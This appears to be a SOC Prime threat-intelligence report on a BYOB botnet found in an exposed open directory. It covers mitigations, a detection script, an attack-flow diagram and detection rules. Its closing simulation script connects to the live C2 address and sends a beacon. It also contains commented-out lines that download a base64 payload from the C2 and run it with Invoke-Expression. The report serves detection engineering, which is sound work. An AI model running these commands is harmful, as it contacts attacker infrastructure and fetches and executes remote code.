SOC Prime Bias: Medium

02 Feb 2026 14:23

Exposed Open Directory Leaks a Full BYOB Deployment Across Windows, Linux, and macOS

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report describes how an open directory on a command‑and‑control server exposed a complete BYOB (Build Your Own Botnet) deployment. The server hosted droppers, stagers and a full RAT for Windows, Linux and macOS. Multiple persistence mechanisms and post‑exploitation modules such as keylogging, email harvesting and packet capture were recovered. Two of the five infrastructure nodes also ran XMRig cryptocurrency miners.

Investigation

Researchers used open‑directory intelligence to download the entire BYOB framework from IP 38.255.43.60. They reverse‑engineered the three‑stage infection chain, identified anti‑VM checks, persistence techniques, and various collection modules. Infrastructure analysis revealed five C2 nodes across the United States, Singapore and Panama, with dual use for remote access and cryptomining. Enrichment added geolocation, ASN and provider details.

Mitigation

Limit unauthorized Python execution and enforce application control. Monitor creation of startup .url files, registry Run keys, scheduled tasks and WMI subscriptions. Detect outbound HTTP to uncommon ports (8080‑8083) and repeated‑slash URL patterns. Deploy EDR to alert on in‑memory loaders and COM automation of Outlook.
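The network indicators above (HTTP to ports 8080-8083, repeated-slash URL paths, and downloads straight from a bare IP) can be checked against proxy telemetry. The Python below is an added example, not code from the report or from SOC Prime; the log line format and the sample lines are constructed for the example, and the ports come from the mitigation text.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Uncommon HTTP ports the report ties to the BYOB C2 nodes (8080-8083).
C2_PORTS = range(8080, 8084)
# Repeated-slash path pattern, e.g. http://host:8081//stage//payload
REPEATED_SLASH = re.compile(r"//")

# Constructed proxy log lines for this example; the format
# "<timestamp> <src_ip> <method> <url> <status>" is an assumption.
SAMPLE_LOG = """\
2026-02-02T14:23:01Z 10.0.0.5 GET https://api.ipify.org/?format=text 200
2026-02-02T14:23:02Z 10.0.0.5 GET http://38.255.43.60:8081//stage//payload.b64 200
2026-02-02T14:23:03Z 10.0.0.7 GET http://intranet.example/status 200
2026-02-02T14:23:04Z 10.0.0.7 GET http://updates.example:8080/pkg.zip 200
"""

def analyse_proxy_line(line):
    """Return (src_ip, url, reasons) for a suspicious outbound HTTP request, else None."""
    parts = line.split()
    if len(parts) < 5:
        return None                    # malformed line: skip, do not crash
    src, url = parts[1], parts[3]
    u = urlsplit(url)
    if u.scheme != "http":             # the report's indicators are plain HTTP
        return None
    try:
        port = u.port                  # .port raises on a non-numeric port
    except ValueError:
        port = None
    reasons = []
    if port in C2_PORTS:
        reasons.append("uncommon-http-port")
    if REPEATED_SLASH.search(u.path):
        reasons.append("repeated-slash-url")
    try:
        ip_address(u.hostname or "")   # bare-IP host: download direct from IP
        reasons.append("direct-ip-host")
    except ValueError:
        pass
    return (src, url, tuple(reasons)) if reasons else None

def scan(log_text):
    """Run the checks over every line and return the list of hits."""
    return [h for h in map(analyse_proxy_line, log_text.splitlines()) if h]

if __name__ == "__main__":
    for src, url, reasons in scan(SAMPLE_LOG):
        print(src, url, ", ".join(reasons))
```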

Response

Block the identified C2 IPs and ports at the network perimeter. Isolate affected hosts, capture memory images, and remove all observed persistence artifacts. Review logs for additional C2 traffic and lateral movement. Conduct forensic analysis to identify exfiltrated data.

Attack Flow

    graph TB
        %% Class definitions
        classDef technique fill:#99ccff
        classDef persistence fill:#ffcc99
        classDef escalation fill:#ff9966
        classDef action fill:#99ff99
        classDef exfil fill:#ff9999

        %% Nodes – Techniques
        tech_dropper_python["<b>Technique</b> – <b>T1059.006 Python</b><br/><b>Description</b>: Execute malicious Python code via interpreter."]
        class tech_dropper_python technique
        tech_obfuscation["<b>Technique</b> – <b>T1027 Obfuscation</b><br/><b>Description</b>: Encode or compress payloads (Base64, Zlib, Marshal) to hide intent."]
        class tech_obfuscation technique
        tech_stager["<b>Technique</b> – <b>T1497.002 System Checks</b><br/><b>Description</b>: Perform anti-VM and sandbox checks before proceeding."]
        class tech_stager technique
        tech_http_retrieval["<b>Technique</b> – <b>T1071.001 Web Protocols / T1571 Non-Standard Port</b><br/><b>Description</b>: Retrieve additional payloads over HTTP using uncommon ports."]
        class tech_http_retrieval technique
        tech_multistage["<b>Technique</b> – <b>T1104 Multi-Stage Channels</b><br/><b>Description</b>: Use several communication stages to hide C2 traffic."]
        class tech_multistage technique

        %% Node – Persistence grouping
        persistence_mech["<b>Persistence</b> – Collection of mechanisms used to maintain foothold."]
        class persistence_mech persistence

        %% Persistence techniques
        pers_registry_run["<b>Technique</b> – <b>T1547.001 Registry Run Key</b><br/><b>Description</b>: Add entries under HKCU/HKLM Run keys for auto-start."]
        class pers_registry_run persistence
        pers_startup_url["<b>Technique</b> – <b>T1547.009 Shortcut Modification</b><br/><b>Description</b>: Drop a .eu.url file in the Startup folder to execute on login."]
        class pers_startup_url persistence
        pers_scheduled_task["<b>Technique</b> – <b>T1053.005 Scheduled Task</b><br/><b>Description</b>: Create a scheduled task to run malicious code at defined intervals."]
        class pers_scheduled_task persistence
        pers_wmi_subscription["<b>Technique</b> – <b>T1546.003 WMI Event Subscription</b><br/><b>Description</b>: Register a WMI event that triggers payload execution."]
        class pers_wmi_subscription persistence
        pers_launchagent["<b>Technique</b> – <b>T1543.001 Launch Agent (macOS)</b><br/><b>Description</b>: Install a launch agent plist for persistence on macOS."]
        class pers_launchagent persistence
        pers_launchdaemon["<b>Technique</b> – <b>T1543.004 Launch Daemon (macOS)</b><br/><b>Description</b>: Install a launch daemon plist for system-wide persistence on macOS."]
        class pers_launchdaemon persistence

        %% Privilege escalation
        esc_uac_bypass["<b>Technique</b> – <b>T1548.002 Bypass UAC</b><br/><b>Description</b>: Exploit UAC weaknesses to obtain elevated privileges."]
        class esc_uac_bypass escalation

        %% Additional actions
        act_keylogging["<b>Action</b> – <b>T1056.001 Keylogging</b><br/><b>Description</b>: Capture user keystrokes for credential theft."]
        class act_keylogging action
        act_process_discovery["<b>Action</b> – <b>T1057 Process Discovery</b><br/><b>Description</b>: Enumerate running processes to map the environment."]
        class act_process_discovery action
        act_network_sniffing["<b>Action</b> – <b>T1040 Network Sniffing</b><br/><b>Description</b>: Capture network packets to gather additional data."]
        class act_network_sniffing action
        act_outlook_collection["<b>Action</b> – <b>T1114.001 Outlook Email Collection</b><br/><b>Description</b>: Harvest email data from Outlook stores."]
        class act_outlook_collection action
        exfil_c2["<b>Exfiltration</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: Send collected data back through the established C2 channel."]
        class exfil_c2 exfil

        %% Connections – Attack Flow
        tech_dropper_python -->|executes| tech_obfuscation
        tech_obfuscation -->|prepares| tech_stager
        tech_stager -->|launches| tech_http_retrieval
        tech_http_retrieval -->|downloads| tech_multistage
        tech_multistage -->|establishes| persistence_mech
        persistence_mech -->|uses| pers_registry_run
        persistence_mech -->|uses| pers_startup_url
        persistence_mech -->|uses| pers_scheduled_task
        persistence_mech -->|uses| pers_wmi_subscription
        persistence_mech -->|uses| pers_launchagent
        persistence_mech -->|uses| pers_launchdaemon
        tech_multistage -->|enables| esc_uac_bypass
        tech_multistage -->|enables| act_keylogging
        tech_multistage -->|enables| act_process_discovery
        tech_multistage -->|enables| act_network_sniffing
        tech_multistage -->|enables| act_outlook_collection
        tech_multistage -->|enables| exfil_c2

Detections

Possible IP Lookup Domain Communications Attempted (via dns)

SOC Prime Team
30 Jan 2026

Possible Defense Evasion by Use of Base64 Command (via cmdline)

SOC Prime Team
30 Jan 2026

Suspicious Taskkill Execution (via cmdline)

SOC Prime Team
30 Jan 2026

Attrib Execution to Hide Files (via cmdline)

SOC Prime Team
30 Jan 2026

Suspicious File Download Direct IP (via proxy)

SOC Prime Team
30 Jan 2026

Cron File Was Created (via file_event)

SOC Prime Team
30 Jan 2026

Suspicious Binary / Scripts in Autostart Location (via file_event)

SOC Prime Team
30 Jan 2026

Suspicious MacOS – Plist Locations and Names (via file_event)

SOC Prime Team
30 Jan 2026

Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)

SOC Prime Team
30 Jan 2026

IOCs (DestinationIP) to detect: Exposed Open Directory Leaks a Full BYOB Deployment Across Windows, Linux, and macOS

SOC Prime AI Rules
30 Jan 2026

IOCs (SourceIP) to detect: Exposed Open Directory Leaks a Full BYOB Deployment Across Windows, Linux, and macOS

SOC Prime AI Rules
30 Jan 2026

IOCs (HashMd5) to detect: Exposed Open Directory Leaks a Full BYOB Deployment Across Windows, Linux, and macOS

SOC Prime AI Rules
30 Jan 2026

Detection of BYOB Malware Execution and Process Manipulation [Windows Process Creation]

SOC Prime AI Rules
30 Jan 2026

Detection of BYOB Malware Persistence via Registry Run Key [Windows Registry Event]

SOC Prime AI Rules
30 Jan 2026

Detection of BYOB C2 Communication and IP Check [Windows Network Connection]

SOC Prime AI Rules
30 Jan 2026

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) intended to trigger the detection rule. The commands and narrative must directly reflect the identified TTPs and generate exactly the telemetry the detection logic expects.

  • Attack Narrative & Commands:

    1. Public‑IP Discovery: The attacker runs a PowerShell one‑liner to obtain its external IP via api.ipify.org. This generates a DNS query for api.ipify.org, satisfying the rule’s domain selector.
    2. C2 Contact: Independently of the result of step 1, the attacker initiates a TCP connection to the hard-coded BYOB C2 server at 38.255.43.60 on port 8081. The firewall logs this outbound connection, matching both the dst_ip and dst_port selectors.
    3. Payload Retrieval (optional): The attacker downloads a base64‑encoded payload, decodes, and executes it – representing downstream techniques (e.g., T1140, T1059.006).
  • Regression Test Script:

    # -------------------------------------------------
    # BYOB C2 Communication & Public IP Discovery Test
    # -------------------------------------------------
    # Step 1: Discover public IP via api.ipify.org
    #         (the DNS lookup for api.ipify.org is the telemetry the rule keys on)
    try {
        $publicIp = Invoke-RestMethod -Uri "https://api.ipify.org?format=text" -Method Get -TimeoutSec 5
        Write-Host "Public IP discovered: $publicIp"
    } catch {
        Write-Warning "Failed to query api.ipify.org – aborting test."
        exit 1
    }
    
    # Step 2: Establish C2 connection to the hard-coded server
    $c2Ip   = "38.255.43.60"
    $c2Port = 8081
    
    # Use a simple TCP client to generate firewall traffic (dst_ip / dst_port selectors)
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $client.Connect($c2Ip, $c2Port)
        # ${var} braces keep PowerShell from reading "$c2Ip:" as a drive-qualified name
        Write-Host "Connected to C2 ${c2Ip}:${c2Port}"
        # Send a lightweight beacon (optional)
        $stream = $client.GetStream()
        $payload = [System.Text.Encoding]::ASCII.GetBytes("beacon`n")
        $stream.Write($payload, 0, $payload.Length)
        $stream.Flush()
    } catch {
        Write-Warning "Unable to connect to C2 endpoint – ensure network egress is allowed."
    } finally {
        # Close() also releases the socket; safe to call even if Connect() failed
        $client.Close()
    }
    
    # Optional: Retrieve a mock payload (simulated; left commented out)
    # $maliciousCode = Invoke-WebRequest -Uri "http://$c2Ip/payload.b64" -UseBasicParsing
    # $decoded = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($maliciousCode.Content))
    # Invoke-Expression $decoded
  • Cleanup Commands:

    # No persistent artifacts were created. Just ensure any lingering connections are closed.
    # Verify no orphaned TcpClient objects remain (PowerShell automatically disposes them).
    Write-Host "Cleanup complete – no residual processes."